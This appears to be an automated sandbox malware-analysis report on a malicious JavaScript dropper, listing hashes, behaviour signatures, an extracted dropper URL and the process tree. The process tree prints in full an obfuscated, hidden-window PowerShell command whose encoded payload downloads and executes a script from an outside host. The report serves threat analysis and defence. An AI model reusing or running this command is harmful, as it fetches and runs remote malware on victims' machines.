Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
05/10/2022, 17:44
Static task
static1
Behavioral task
behavioral1
Sample
2r173553.js
Resource
win7-20220812-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
2r173553.js
Resource
win10v2004-20220901-en
11 signatures
150 seconds
General
-
Target
2r173553.js
-
Size
65KB
-
MD5
42625280d7ea0118ffc3ba0eaff9575f
-
SHA1
1d467b690f2cdabaeaf23fab107518c8b93d575e
-
SHA256
755f02811e641133015c14e6acf380ca252d2ce31bda38720a8e9c02e4293e9d
-
SHA512
4cff0c2a786358e21b495c3ad5139f63c81c80bc0434855f36c4be9ec83d46f9d37602fb64d44f0fd848b01495da1842d1042ba44b6d219e17d360a2db58a92e
-
SSDEEP
1536:NNgvWGtQUfabDbvs3asDjGisacq7EfKTc3FR2:NNgvWGtQJbDbvs3asfDGKY3FR2
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://sunassetmanagement.com/wp/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1756 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1756 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1500 wrote to memory of 996 1500 wscript.exe 27 PID 1500 wrote to memory of 996 1500 wscript.exe 27 PID 1500 wrote to memory of 996 1500 wscript.exe 27 PID 996 wrote to memory of 1756 996 cmd.exe 29 PID 996 wrote to memory of 1756 996 cmd.exe 29 PID 996 wrote to memory of 1756 996 cmd.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2r173553.js1⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWErSheLl -nop -w hiDdEn -Ep bypaSs -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwB1AG4AYQBzAHMAZQB0AG0AYQBuAGEAZwBlAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAvACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWErSheLl -nop -w hiDdEn -Ep bypaSs -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwB1AG4AYQBzAHMAZQB0AG0AYQBuAGEAZwBlAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAvACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-